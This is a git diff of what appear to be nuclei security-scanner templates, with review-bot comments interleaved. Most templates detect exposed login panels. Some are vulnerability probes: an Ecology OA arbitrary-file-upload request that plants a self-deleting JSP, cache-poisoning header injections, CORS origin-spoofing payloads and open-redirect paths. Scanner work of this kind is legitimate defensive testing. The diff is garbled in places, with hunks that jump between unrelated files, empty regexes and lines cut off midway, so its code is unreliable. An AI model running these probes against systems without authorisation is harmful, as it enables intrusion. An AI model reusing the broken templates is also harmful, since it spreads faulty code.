b/exposed-panels/aws-opensearch-login.yaml 
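Review bot: The `description` in the new `avtech-avn801-camera-panel.yaml` is vendor marketing copy ("Select the items needed to narrow down product search.") rather than a statement of what a match means, and the file omits the `classification` block the other new panels carry. Replace it with something like `description: An Avtech AVN801 network camera login panel was detected.` and add `classification:` with `cwe-id: CWE-200`.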
@@ -0,0 +1,25 @@ +id: aws-opensearch-login + +info: + name: AWS OpenSearch Default Login + author: Higor Melgaço (eremit4) + severity: medium + description: Searches for the AWS OpenSearch login page + reference: + - https://aws.amazon.com/pt/blogs/opensource/introducing-opensearch/ + tags: panel,opensearch,aws + +requests: + - method: GET + path: + - '{{BaseURL}}/_dashboards/app/login' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Please login to OpenSearch Dashboards" \ No newline at end of file diff --git a/exposed-panels/axigen-webadmin.yaml b/exposed-panels/axigen-webadmin.yaml index 5aa5cc7b3e..515f319cbe 100644 --- a/exposed-panels/axigen-webadmin.yaml +++ b/exposed-panels/axigen-webadmin.yaml @@ -1,11 +1,16 @@ id: axigen-webadmin info: - name: Axigen Web Admin + name: Axigen Web Admin Detection author: dhiyaneshDk severity: info + description: An Axigen Web Admin panel was discovered. + reference: + - https://www.axigen.com/ + classification: + cwe-id: CWE-200 metadata: - shodan-query: 'http.title:"Axigen WebAdmin"' + shodan-query: http.title:"Axigen WebAdmin" tags: axigen,panel requests: @@ -17,8 +22,10 @@ requests: matchers: - type: word words: - - 'Axigen WebAdmin' + - 'Axigen WebAdmin' - type: status status: - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/exposed-panels/axigen-webmail.yaml b/exposed-panels/axigen-webmail.yaml index 859ced9706..0b61e4d8bd 100644 --- a/exposed-panels/axigen-webmail.yaml +++ b/exposed-panels/axigen-webmail.yaml @@ -1,11 +1,16 @@ id: axigen-webmail info: - name: Axigen WebMail - author: dhiyaneshDk + name: Axigen WebMail PanelDetection + author: dhiyaneshDk,idealphase severity: info + description: An Axigen webmail panel was discovered. + reference: + - https://www.axigen.com/ + classification: + cwe-id: CWE-200 metadata: - shodan-query: 'http.title:"Axigen WebMail"' + shodan-query: http.title:"Axigen WebMail" tags: axigen,panel requests: 
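Review bot: `severity: medium` is out of line for what this template actually does — it only matches the literal `Please login to OpenSearch Dashboards` on `/_dashboards/app/login`, which is the same login-page fingerprinting every other panel template in this commit reports as `severity: info`. The name `AWS OpenSearch Default Login` compounds that, since it reads as a default-credential check the template never performs. I would change the two lines to `severity: info` and `name: AWS OpenSearch Dashboards Login Panel`, and reword the description to say it detects the login page only; adding `part: body` to the word matcher would also keep the string from matching in headers.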
@@ -15,10 +20,21 @@ requests: matchers-condition: and matchers: - - type: word - words: - - 'Axigen WebMail' + - type: regex + regex: + - '(?i)(Axigen WebMail)' + - 'Axigen Standard Webmail - (.*)' + condition: or - type: status status: - 200 + + extractors: + - type: regex + group: 1 + part: body + regex: + - '' - 'Bolt requires JavaScript to function properly and continuing without it might corrupt or erase data.' - 'Bolt » Login' - - 'Cookies are required to log on to Bolt. Please allow cookies.' \ No newline at end of file + - 'Cookies are required to log on to Bolt. Please allow cookies.' + + - type: status + status: + - 200 diff --git a/exposed-panels/bomgar-login-panel.yaml b/exposed-panels/bomgar-login-panel.yaml new file mode 100644 index 0000000000..9234016689 --- /dev/null +++ b/exposed-panels/bomgar-login-panel.yaml @@ -0,0 +1,29 @@ +id: bomgar-login-panel + +info: + name: Bomgar Login Panel + author: pdteam + severity: info + tags: panel,bomgar,beyondtrust + +requests: + - method: GET + path: + - "{{BaseURL}}/favicon.ico" + - "{{BaseURL}}/appliance/login.ns" + + stop-at-first-match: true + matchers-condition: or + matchers: + + - type: dsl + dsl: + - "status_code==200" + - "('829321644' == mmh3(base64_py(body)))" + condition: and + + - type: dsl + dsl: + - "status_code==200" + - "contains(tolower(body), 'bomgar')" + condition: and \ No newline at end of file diff --git a/technologies/bookstack-detect.yaml b/exposed-panels/bookstack-panel.yaml similarity index 50% rename from technologies/bookstack-detect.yaml rename to exposed-panels/bookstack-panel.yaml index 6dde7e550c..68ceb1a90c 100644 --- a/technologies/bookstack-detect.yaml +++ b/exposed-panels/bookstack-panel.yaml 
@@ -1,12 +1,15 @@ -id: bookstack-detect +id: bookstack-panel info: - name: BookStack detect - author: cyllective + name: BookStack Panel Login + author: cyllective,daffainfo severity: info - description: Detects BookStack - tags: tech,bookstack - reference: https://github.com/BookStackApp/BookStack + description: A platform to create documentation/wiki content built with PHP & Laravel + reference: + - https://github.com/BookStackApp/BookStack + metadata: + shodan-query: http.title:"BookStack" + tags: panel,bookstack requests: - method: GET @@ -22,6 +25,15 @@ requests: - 'BookStack' - 'BookStack' + - type: word + part: header + words: + - 'Set-Cookie: bookstack_session' + + - type: status + status: + - 200 + extractors: - type: regex part: body diff --git a/exposed-panels/buddy-panel.yaml b/exposed-panels/buddy-panel.yaml new file mode 100644 index 0000000000..f3bac86b16 --- /dev/null +++ b/exposed-panels/buddy-panel.yaml @@ -0,0 +1,31 @@ +id: buddy-panel + +info: + name: Buddy Panel Detect + author: thardt-praetorian + severity: info + reference: + - https://buddy.works + metadata: + shodan-query: http.favicon.hash:-850502287 + tags: panel,buddy,cicd + +requests: + - method: GET + path: + - '{{BaseURL}}' + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'Buddy App' + condition: or + + - type: status + status: + - 200 diff --git a/exposed-panels/buildbot-panel.yaml b/exposed-panels/buildbot-panel.yaml new file mode 100644 index 0000000000..b5d2d36574 --- /dev/null +++ b/exposed-panels/buildbot-panel.yaml 
@@ -0,0 +1,29 @@ +id: buildbot-panel + +info: + name: Buildbot Panel Detect + author: thardt-praetorian + severity: info + reference: + - https://buildbot.net + metadata: + shodan-query: http.title:"BuildBot" + tags: panel,buildbot,cicd + +requests: + - method: GET + path: + - '{{BaseURL}}' + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'Buildbot' + + - type: status + status: + - 200 diff --git a/technologies/cacti-detect.yaml b/exposed-panels/cacti-panel.yaml similarity index 62% rename from technologies/cacti-detect.yaml rename to exposed-panels/cacti-panel.yaml index 10d928122a..63880c5c39 100644 --- a/technologies/cacti-detect.yaml +++ b/exposed-panels/cacti-panel.yaml @@ -1,10 +1,11 @@ -id: cacti-detect +id: cacti-panel + info: - name: Detect Cacti - author: geeknik - description: Cacti is a complete network graphing solution -- https://www.cacti.net/ + name: Cacti Login Panel + author: geeknik,daffainfo severity: info - tags: tech,cacti + description: Cacti is a complete network graphing solution -- https://www.cacti.net/ + tags: tech,cacti,login requests: - method: GET @@ -12,15 +13,17 @@ requests: - "{{BaseURL}}" - "{{BaseURL}}/cacti/" + stop-at-first-match: true matchers-condition: and matchers: - type: status status: - 200 + - type: word part: body words: - - "Login to Cacti" + - "Login to Cacti" - "The Cacti Group" condition: and @@ -30,7 +33,8 @@ requests: - Cacti+ extractors: - - type: kval - part: header - kval: - - Set_Cookie + - type: regex + part: body + group: 1 + regex: + - "
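Review bot: The cacti template is moved into `exposed-panels/` but its new tag line is `tags: tech,cacti,login`, so `-tags panel` (the selector the other files renamed here — aviatrix, bookstack — switched to) will not run it, while `-tags tech` still treats it as a technology fingerprint. I would change the line to `tags: panel,cacti,login` to match the directory move. The `description` also keeps the inline `-- https://www.cacti.net/` suffix; the sibling templates put that URL under `reference:`.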

Version (.*) |" diff --git a/exposed-panels/calendarix-panel.yaml b/exposed-panels/calendarix-panel.yaml index a8581f03b6..f71d64b01c 100644 --- a/exposed-panels/calendarix-panel.yaml +++ b/exposed-panels/calendarix-panel.yaml @@ -4,7 +4,7 @@ info: name: Calendarix login detect author: r3dg33k severity: info - tags: panel,calendarix + tags: panel,calendarix,login requests: - method: GET diff --git a/exposed-panels/camunda-login-panel.yaml b/exposed-panels/camunda-login-panel.yaml index ca5b5f04c2..5840e1ac5c 100644 --- a/exposed-panels/camunda-login-panel.yaml +++ b/exposed-panels/camunda-login-panel.yaml @@ -1,11 +1,13 @@ id: camunda-login-panel + info: name: Camunda Login panel author: alifathi-h1 severity: info description: Default Credentials of demo:demo on Camunda application. - reference: https://docs.camunda.org/manual/7.15/webapps/admin/user-management/ - tags: camunda,panel + reference: + - https://docs.camunda.org/manual/7.15/webapps/admin/user-management/ + tags: camunda,panel,login requests: - method: GET diff --git a/exposed-panels/cas-login.yaml b/exposed-panels/cas-login.yaml new file mode 100644 index 0000000000..63128dc97a --- /dev/null +++ b/exposed-panels/cas-login.yaml @@ -0,0 +1,22 @@ +id: cas-login + +info: + name: CAS Login Panel + author: pdteam + severity: info + metadata: + shodan-query: http.title:'CAS - Central Authentication Service' + github: https://github.com/apereo/cas + tags: apereo,cas,panel,login + +requests: + - method: GET + path: + - "{{BaseURL}}/cas/login" + + redirects: true + max-redirects: 2 + matchers: + - type: word + words: + - 'Central Authentication Service' diff --git a/exposed-panels/casdoor-login.yaml b/exposed-panels/casdoor-login.yaml new file mode 100644 index 0000000000..2ae5b5d8cc --- /dev/null +++ b/exposed-panels/casdoor-login.yaml 
@@ -0,0 +1,26 @@ +id: casdoor-login + +info: + name: Casdoor Login Panel + author: princechaddha + severity: info + metadata: + shodan-query: http.title:"Casdoor" + tags: panel,casdoor + +requests: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Casdoor" + + - type: status + status: + - 200 diff --git a/exposed-panels/casemanager-panel.yaml b/exposed-panels/casemanager-panel.yaml new file mode 100644 index 0000000000..d32cde87a7 --- /dev/null +++ b/exposed-panels/casemanager-panel.yaml @@ -0,0 +1,24 @@ +id: casemanager-panel + +info: + name: CaseManager Panel + author: ffffffff0x + severity: info + metadata: + fofa-query: title="CaseManager" + tags: casemanager,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers-condition: and + matchers: + - type: word + words: + - "CaseManager" + + - type: status + status: + - 200 diff --git a/exposed-panels/centreon-panel.yaml b/exposed-panels/centreon-panel.yaml new file mode 100644 index 0000000000..88baaaf63d --- /dev/null +++ b/exposed-panels/centreon-panel.yaml @@ -0,0 +1,34 @@ +id: centreon-panel + +info: + name: Centreon Login Panel + author: pikpikcu,daffainfo + severity: info + metadata: + shodan-query: http.title:"Centreon" + tags: panel,centreon,login + +requests: + - method: GET + path: + - "{{BaseURL}}/centreon/index.php" + + matchers-condition: and + matchers: + - type: word + part: body + condition: or + words: + - 'Centreon - IT & Network Monitoring' + - 'SSL Network Extender Login" + + - type: status + status: + - 200 diff --git a/exposed-panels/circarlife-setup.yaml b/exposed-panels/circarlife-setup.yaml index f1be4d4778..7f06746f27 100644 --- a/exposed-panels/circarlife-setup.yaml +++ b/exposed-panels/circarlife-setup.yaml 
@@ -3,10 +3,11 @@ id: circarlife-setup info: name: Exposed CirCarLife Setup Page author: geeknik - description: CirCarLife is an internet-connected electric vehicle charging station - reference: https://circontrol.com/ severity: critical - tags: scada,circontrorl,circarlife,setup,exposure,panel + description: CirCarLife is an internet-connected electric vehicle charging station + reference: + - https://circontrol.com/ + tags: scada,circontrol,circarlife,setup,exposure,panel requests: - method: GET diff --git a/exposed-panels/cisco/cisco-ace-device-manager.yaml b/exposed-panels/cisco/cisco-ace-device-manager.yaml index 09704c579f..70e4205e76 100644 --- a/exposed-panels/cisco/cisco-ace-device-manager.yaml +++ b/exposed-panels/cisco/cisco-ace-device-manager.yaml @@ -4,9 +4,9 @@ info: name: ACE 4710 Device Manager author: dhiyaneshDk severity: info - tags: panel,cisco metadata: - shodan-query: 'html:"ACE 4710 Device Manager"' + shodan-query: html:"ACE 4710 Device Manager" + tags: panel,cisco requests: - method: GET diff --git a/exposed-panels/cisco-asa-panel.yaml b/exposed-panels/cisco/cisco-asa-panel.yaml similarity index 78% rename from exposed-panels/cisco-asa-panel.yaml rename to exposed-panels/cisco/cisco-asa-panel.yaml index 0db529493b..b87b8121bf 100644 --- a/exposed-panels/cisco-asa-panel.yaml +++ b/exposed-panels/cisco/cisco-asa-panel.yaml @@ -15,6 +15,8 @@ requests: max-redirects: 2 matchers: - type: word - words: - - "SSL VPN Service" part: body + words: + - "/+CSCOU+/portal.css" + - "SSL VPN Service" + condition: or \ No newline at end of file diff --git a/exposed-panels/cisco/cisco-edge-340.yaml b/exposed-panels/cisco/cisco-edge-340.yaml index 17a60b6a18..4dbd5caf85 100644 --- a/exposed-panels/cisco/cisco-edge-340.yaml +++ b/exposed-panels/cisco/cisco-edge-340.yaml 
@@ -4,9 +4,9 @@ info: name: Cisco Edge 340 author: dhiyaneshDk severity: info - tags: panel,cisco metadata: - shodan-query: 'http.title:"Cisco Edge 340"' + shodan-query: http.title:"Cisco Edge 340" + tags: panel,cisco requests: - method: GET diff --git a/exposed-panels/cisco-finesse-login.yaml b/exposed-panels/cisco/cisco-finesse-login.yaml similarity index 88% rename from exposed-panels/cisco-finesse-login.yaml rename to exposed-panels/cisco/cisco-finesse-login.yaml index 0944959e91..ad8938564b 100644 --- a/exposed-panels/cisco-finesse-login.yaml +++ b/exposed-panels/cisco/cisco-finesse-login.yaml @@ -4,7 +4,8 @@ info: name: Cisco Finesse Login author: dhiyaneshDK severity: info - reference: https://www.exploit-db.com/ghdb/6824 + reference: + - https://www.exploit-db.com/ghdb/6824 tags: panel,cisco requests: diff --git a/exposed-panels/cisco-integrated-login.yaml b/exposed-panels/cisco/cisco-integrated-login.yaml similarity index 88% rename from exposed-panels/cisco-integrated-login.yaml rename to exposed-panels/cisco/cisco-integrated-login.yaml index 0804d5a189..5f716a0018 100644 --- a/exposed-panels/cisco-integrated-login.yaml +++ b/exposed-panels/cisco/cisco-integrated-login.yaml @@ -4,7 +4,8 @@ info: name: Cisco Integrated Management Controller Login author: dhiyaneshDK severity: info - reference: https://www.exploit-db.com/ghdb/3859 + reference: + - https://www.exploit-db.com/ghdb/3859 tags: panel,cisco requests: diff --git a/exposed-panels/cisco-meraki-exposure.yaml b/exposed-panels/cisco/cisco-meraki-exposure.yaml similarity index 90% rename from exposed-panels/cisco-meraki-exposure.yaml rename to exposed-panels/cisco/cisco-meraki-exposure.yaml index 112800ebd8..d14835d3a6 100644 --- a/exposed-panels/cisco-meraki-exposure.yaml +++ b/exposed-panels/cisco/cisco-meraki-exposure.yaml 
@@ -4,7 +4,8 @@ info: name: Cisco Meraki cloud & security Appliances Information Disclosure author: dhiyaneshDK,r3naissance severity: info - reference: https://www.exploit-db.com/ghdb/6708 + reference: + - https://www.exploit-db.com/ghdb/6708 tags: panel,cisco,meraki,disclosure requests: diff --git a/exposed-panels/cisco/cisco-prime-infrastructure.yaml b/exposed-panels/cisco/cisco-prime-infrastructure.yaml index 1ef40b53b8..2b4d60a237 100644 --- a/exposed-panels/cisco/cisco-prime-infrastructure.yaml +++ b/exposed-panels/cisco/cisco-prime-infrastructure.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDk severity: info metadata: - shodan-query: 'http.title:"prime infrastructure"' + shodan-query: http.title:"prime infrastructure" tags: panel,cisco requests: diff --git a/exposed-panels/cisco-sd-wan.yaml b/exposed-panels/cisco/cisco-sd-wan.yaml similarity index 69% rename from exposed-panels/cisco-sd-wan.yaml rename to exposed-panels/cisco/cisco-sd-wan.yaml index 6376c9a8ca..0f9113cc89 100644 --- a/exposed-panels/cisco-sd-wan.yaml +++ b/exposed-panels/cisco/cisco-sd-wan.yaml @@ -4,7 +4,8 @@ info: name: Cisco SD-WAN panel author: z3bd severity: info - reference: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-bufovulns-B5NrSHbj + reference: + - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-bufovulns-B5NrSHbj tags: panel,cisco requests: diff --git a/exposed-panels/cisco/cisco-secure-cn.yaml b/exposed-panels/cisco/cisco-secure-cn.yaml index 6914a5cc7e..44f85105e8 100644 --- a/exposed-panels/cisco/cisco-secure-cn.yaml +++ b/exposed-panels/cisco/cisco-secure-cn.yaml @@ -4,9 +4,9 @@ info: name: Cisco Secure CN author: dhiyaneshDk severity: info - tags: panel,cisco metadata: - shodan-query: 'http.title:"Cisco Secure CN"' + shodan-query: http.title:"Cisco Secure CN" + tags: panel,cisco requests: - method: GET 
diff --git a/exposed-panels/cisco-secure-desktop.yaml b/exposed-panels/cisco/cisco-secure-desktop.yaml similarity index 100% rename from exposed-panels/cisco-secure-desktop.yaml rename to exposed-panels/cisco/cisco-secure-desktop.yaml diff --git a/exposed-panels/cisco-sendgrid.yaml b/exposed-panels/cisco/cisco-sendgrid.yaml similarity index 85% rename from exposed-panels/cisco-sendgrid.yaml rename to exposed-panels/cisco/cisco-sendgrid.yaml index d9708bf9f3..7148f305d0 100644 --- a/exposed-panels/cisco-sendgrid.yaml +++ b/exposed-panels/cisco/cisco-sendgrid.yaml @@ -4,7 +4,8 @@ info: name: Cisco ServiceGrid author: dhiyaneshDK severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Cisco+ServiceGrid%22 + reference: + - https://www.shodan.io/search?query=http.title%3A%22Cisco+ServiceGrid%22 tags: panel,cisco requests: diff --git a/exposed-panels/cisco/cisco-systems-login.yaml b/exposed-panels/cisco/cisco-systems-login.yaml index 25607b3bbf..96ae7b9ee4 100644 --- a/exposed-panels/cisco/cisco-systems-login.yaml +++ b/exposed-panels/cisco/cisco-systems-login.yaml @@ -2,11 +2,12 @@ id: cisco-systems-login info: name: Cisco Systems Login - author: dhiyaneshDk + author: dhiyaneshDk,idealphase severity: info - tags: panel,cisco metadata: - shodan-query: 'http.title:"Cisco Systems Login"' + shodan-query: http.title:"Cisco Systems Login" + google-query: intitle:"Cisco Systems Login" + tags: panel,cisco requests: - method: GET @@ -18,8 +19,14 @@ requests: - type: word part: body words: - - "Cisco Systems Login" + - "Cisco Systems Login" - type: status status: - 200 + + extractors: + - type: regex + group: 1 + regex: + - '" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/vulnerabilities/ecology/ecology-arbitrary-file-upload.yaml b/vulnerabilities/ecology/ecology-arbitrary-file-upload.yaml new file mode 100644 index 0000000000..1b96e89056 --- /dev/null 
+++ b/vulnerabilities/ecology/ecology-arbitrary-file-upload.yaml
@@ -0,0 +1,38 @@
+id: ecology-arbitrary-file-upload
+
+info:
+ name: Ecology Arbitrary File Upload
+ author: ritikchaddha
+ severity: medium
+ reference:
+ - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
+ metadata:
+ fofa-query: app="泛微-协同办公OA"
+ tags: ecology,upload,fileupload,intrusive
+
+requests:
+ - raw:
+ - |
+ POST /page/exportImport/uploadOperation.jsp HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFy3iNVBftjP6IOwo
+
+ ------WebKitFormBoundaryFy3iNVBftjP6IOwo
+ Content-Disposition: form-data; name="file"; filename="12.jsp"
+ Content-Type: application/octet-stream
+
+ <%out.print(364536*876356);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
+ ------WebKitFormBoundaryFy3iNVBftjP6IOwo--
+ - |
+ GET /page/exportImport/fileTransfer/{{randstr}}.jsp HTTP/1.1
+ Host: {{Hostname}}
+
+ req-condition: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "status_code_1 == 200"
+ - "contains(body_2, '319463310816') || status_code_2 == 200"
+ condition: and
diff --git a/vulnerabilities/generic/cache-poisoning.yaml b/vulnerabilities/generic/cache-poisoning.yaml
index fa843b73a4..1703f38d93 100644
--- a/vulnerabilities/generic/cache-poisoning.yaml
+++ b/vulnerabilities/generic/cache-poisoning.yaml
@@ -2,8 +2,8 @@ id: cache-poisoning
info:
name: Cache Poisoning
- author: melbadry9,xelkomy
- severity: info
+ author: melbadry9,xelkomy,akincibor,dogasantos
+ severity: low
reference:
- https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning
- https://portswigger.net/research/practical-web-cache-poisoning
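Review bot: The matcher is declared `type: word` but its `words` entries are DSL expressions (`status_code_1 == 200`, `contains(body_2, '319463310816') || ...`), so they are searched for as literal text in the body and the template can never fire; it needs to be `type: dsl` with a `dsl:` list and no `part`. The `|| status_code_2 == 200` fallback would then report any 200 on the fetched path as a confirmed upload even when the JSP never executed, so keep only the `contains(body_2, '319463310816')` check (364536*876356 is indeed 319463310816, and the payload deletes itself after printing it). Separately, the upload is sent as `filename="12.jsp"` while the verification GET fetches `{{randstr}}.jsp`; unless the server renames uploads, both should use the same `{{randstr}}.jsp` name or the second request fetches a file that was never written.
```yaml
      matchers:
        - type: dsl
          dsl:
            - "status_code_1 == 200"
            - "contains(body_2, '319463310816')"
          condition: and
```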
@@ -12,16 +12,22 @@ info:
requests:
- raw:
- |
- GET /?mel=9 HTTP/1.1
- X-Forwarded-Prefix: cache.example.com
- X-Forwarded-Host: cache.example.com
- X-Forwarded-For: cache.example.com
+ GET /?{{randstr}}=9 HTTP/1.1
+ X-Forwarded-Prefix: prefix.cache.example.com
+ X-Forwarded-Host: host.cache.example.com
+ X-Forwarded-For: for.cache.example.com
- |
- GET /?mel=9 HTTP/1.1
+ GET /?{{randstr}}=9 HTTP/1.1
req-condition: true
matchers:
- type: dsl
dsl:
- 'contains(body_2, "cache.example.com")'
+
+ extractors:
+ - type: regex
+ part: response
+ regex:
+ - "(prefix|host|for).cache.example.com"
diff --git a/vulnerabilities/generic/cors-misconfig.yaml b/vulnerabilities/generic/cors-misconfig.yaml
index a476df65b4..0c21683c10 100644
--- a/vulnerabilities/generic/cors-misconfig.yaml
+++ b/vulnerabilities/generic/cors-misconfig.yaml
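Review bot: The matcher `contains(body_2, "cache.example.com")` only inspects the body of the second response, yet `X-Forwarded-Host` is most often reflected into a `Location` redirect or a canonical/`Link` header rather than the body, so those cached reflections are silently missed even though the new extractor already looks at the whole `response`; widen it to `contains(body_2, "cache.example.com") || contains(all_headers_2, "cache.example.com")` (the DSL name for the second response's headers should be checked against the nuclei version in use). The whole check also rests on `{{randstr}}` expanding to the same value in both raw requests so the unprimed second GET hits the entry the first one poisoned — I believe nuclei generates it once per template run, but it is worth confirming, because a fresh value per request would make the second GET a cache miss and the template could never fire.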
@@ -1,63 +1,40 @@
id: cors-misconfig
info:
- name: Basic CORS misconfiguration
- author: nadino,G4L1T0,convisoappsec,pdteam
+ name: CORS Misconfiguration
+ author: nadino,g4l1t0,convisoappsec,pdteam,breno_css
severity: info
- reference: https://portswigger.net/web-security/cors
- tags: cors,generic
+ reference:
+ - https://portswigger.net/web-security/cors
+ - https://www.corben.io/advanced-cors-techniques/
+ - https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/
+ tags: cors,generic,misconfig
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
+ Origin: {{cors_origin}}
- - |
- GET / HTTP/1.1
- Host: {{Hostname}}
- Origin: {{randstr}}.tld
-
- - |
- GET / HTTP/1.1
- Host: {{Hostname}}
- Origin: null
-
-# TODO's for future as currently {{Hostname}} is not supported in matchers
-# Origin: {{randstr}}.{{Hostname}}
-# Origin: {{Hostname}}.{{randstr}}.tld
-# Origin: {{Hostname}}{{randstr}}.tld
-# Origin: {{Hostname}}_.{{randstr}}.tld
-# Origin: {{Hostname}}%60.{{randstr}}.tld
-# Origin: http://{{Hostname}}
-# Origin: http://{{randstr}}.{{Hostname}}
+ payloads:
+ cors_origin:
+ - "https://{{tolower(rand_base(5))}}{{RDN}}" # Arbitrary domain
+ - "https://{{tolower(rand_base(5))}}.com" # Arbitrary domain
+ - "https://{{FQDN}}.{{tolower(rand_base(5))}}.com" # Arbitrary domain
+ - "https://{{FQDN}}{{tolower(rand_base(5))}}.com" # Arbitrary domain
+ - "https://{{FQDN}}_.{{tolower(rand_base(5))}}.com" # Arbitrary domain
+ - "https://{{FQDN}}%60.{{tolower(rand_base(5))}}.com" # Arbitrary domain
+ - "null" # null origin
+ - "https://{{tolower(rand_base(5))}}.{{RDN}}" # Arbitrary subdomain
+ - "http://{{tolower(rand_base(5))}}.{{RDN}}" # Arbitrary subdomain over http
+ stop-at-first-match: true
matchers-condition: or
matchers:
- type: dsl
name: arbitrary-origin
dsl:
- - "contains(tolower(all_headers), 'access-control-allow-origin: {{randstr}}.tld')"
+ - "contains(tolower(all_headers), 'access-control-allow-origin: {{cors_origin}}')"
- "contains(tolower(all_headers), 'access-control-allow-credentials: true')"
- condition: and
-
- - type: dsl
- name: null-origin
- dsl:
- - "contains(tolower(all_headers), 'access-control-allow-origin: null')"
- - "contains(tolower(all_headers), 'access-control-allow-credentials: true')"
- condition: and
-
- - type: dsl
- name: wildcard-acac
- dsl:
- - "contains(tolower(all_headers), 'access-control-allow-origin: *')"
- - "contains(tolower(all_headers), 'access-control-allow-credentials: true')"
- condition: and
-
- - type: dsl
- name: wildcard-no-acac
- dsl:
- - "contains(tolower(all_headers), 'access-control-allow-origin: *')"
- - "!contains(tolower(all_headers), 'access-control-allow-credentials: true')"
- condition: and
+ condition: and
\ No newline at end of file
diff --git a/vulnerabilities/generic/error-based-sql-injection.yaml b/vulnerabilities/generic/error-based-sql-injection.yaml
index c0119a2e3c..d41cf43580 100644
--- a/vulnerabilities/generic/error-based-sql-injection.yaml
+++ b/vulnerabilities/generic/error-based-sql-injection.yaml
@@ -5,7 +5,7 @@ info:
author: geeknik
severity: high
description: Detects the possibility of SQL injection in 29 database engines. Inspired by https://github.com/sqlmapproject/sqlmap/blob/master/data/xml/errors.xml.
- tags: sqli,generic
+ tags: sqli,generic,error
requests:
- method: GET
diff --git a/vulnerabilities/generic/generic-blind-xxe.yaml b/vulnerabilities/generic/generic-blind-xxe.yaml
index a08f153493..5fc978ae6e 100644
--- a/vulnerabilities/generic/generic-blind-xxe.yaml
+++ b/vulnerabilities/generic/generic-blind-xxe.yaml
@@ -4,7 +4,7 @@ info:
name: Generic Blind XXE
author: geeknik
severity: high
- tags: xxe,generic
+ tags: xxe,generic,blind
requests:
- raw:
diff --git a/vulnerabilities/generic/oob-header-based-interaction.yaml b/vulnerabilities/generic/oob-header-based-interaction.yaml
index 332914d8d0..36ddaaae60 100644
--- a/vulnerabilities/generic/oob-header-based-interaction.yaml
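Review bot: The surviving matcher lowercases the response (`tolower(all_headers)`) but compares it against the un-lowercased literal `access-control-allow-origin: {{cors_origin}}`; the `rand_base` part is already lowercased, the `{{FQDN}}`/`{{RDN}}` part is not, so on any input host containing uppercase letters the six host-derived payloads can never match even when the server reflects them. Lowercase the literal too: `contains(tolower(all_headers), tolower('access-control-allow-origin: {{cors_origin}}'))`. Separately, all nine payloads now report under the single name `arbitrary-origin`, although a reflected `null` or an arbitrary subdomain of the target's own `{{RDN}}` is a materially weaker finding than a reflected foreign domain, and with `stop-at-first-match: true` the run ends at the first hit; add an extractor for the `access-control-allow-origin` value (or separate named matchers) so the report says which case actually fired.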
+++ b/vulnerabilities/generic/oob-header-based-interaction.yaml
@@ -5,7 +5,8 @@ info:
author: pdteam
severity: info
description: The remote server fetched a spoofed URL from the request headers.
- reference: https://github.com/PortSwigger/collaborator-everywhere
+ reference:
+ - https://github.com/PortSwigger/collaborator-everywhere
tags: oast,ssrf,generic
requests:
diff --git a/vulnerabilities/generic/oob-param-based-interaction.yaml b/vulnerabilities/generic/oob-param-based-interaction.yaml
index 69955c6ee2..578570a67b 100644
--- a/vulnerabilities/generic/oob-param-based-interaction.yaml
+++ b/vulnerabilities/generic/oob-param-based-interaction.yaml
@@ -5,7 +5,8 @@ info:
author: pdteam
severity: info
description: The remote server fetched a spoofed URL from the request parameters.
- reference: https://github.com/PortSwigger/collaborator-everywhere
+ reference:
+ - https://github.com/PortSwigger/collaborator-everywhere
tags: oast,ssrf,generic
requests:
diff --git a/vulnerabilities/generic/open-redirect.yaml b/vulnerabilities/generic/open-redirect.yaml
index b317702918..2598c937eb 100644
--- a/vulnerabilities/generic/open-redirect.yaml
+++ b/vulnerabilities/generic/open-redirect.yaml
@@ -8,42 +8,115 @@ info: tags: redirect,generic requests: - - method: GET + - raw: + - | + GET /{{redirect}} HTTP/1.1 + Host: {{Hostname}} - path: - - '{{BaseURL}}/example.com/' - - '{{BaseURL}}/example.com//' - - '{{BaseURL}}///;@example.com' - - '{{BaseURL}}///example.com/%2F..' - - '{{BaseURL}}/////example.com' - - '{{BaseURL}}//example.com/%2F..' - - '{{BaseURL}}//example.com/..;/css' - - '{{BaseURL}}/example%E3%80%82com' - - '{{BaseURL}}/%5Cexample.com' - - '{{BaseURL}}/example.com' - - '{{BaseURL}}//example.com/' - - '{{BaseURL}}/%00/example.com/' - - '{{BaseURL}}/%09/example.com/' - - '{{BaseURL}}/%0a/example.com/' - - '{{BaseURL}}/%0d/example.com/' - - '{{BaseURL}}////example.com/%2f%2e%2e' - - '{{BaseURL}}/%5cexample.com/%2f%2e%2e' - - '{{BaseURL}}/{{BaseURL}}example.com' - - '{{BaseURL}}//{{BaseURL}}example.com/' - - '{{BaseURL}}////{{BaseURL}}example.com/%2f%2e%2e' - - '{{BaseURL}}/%5c{{BaseURL}}example.com/%2f%2e%2e' - - 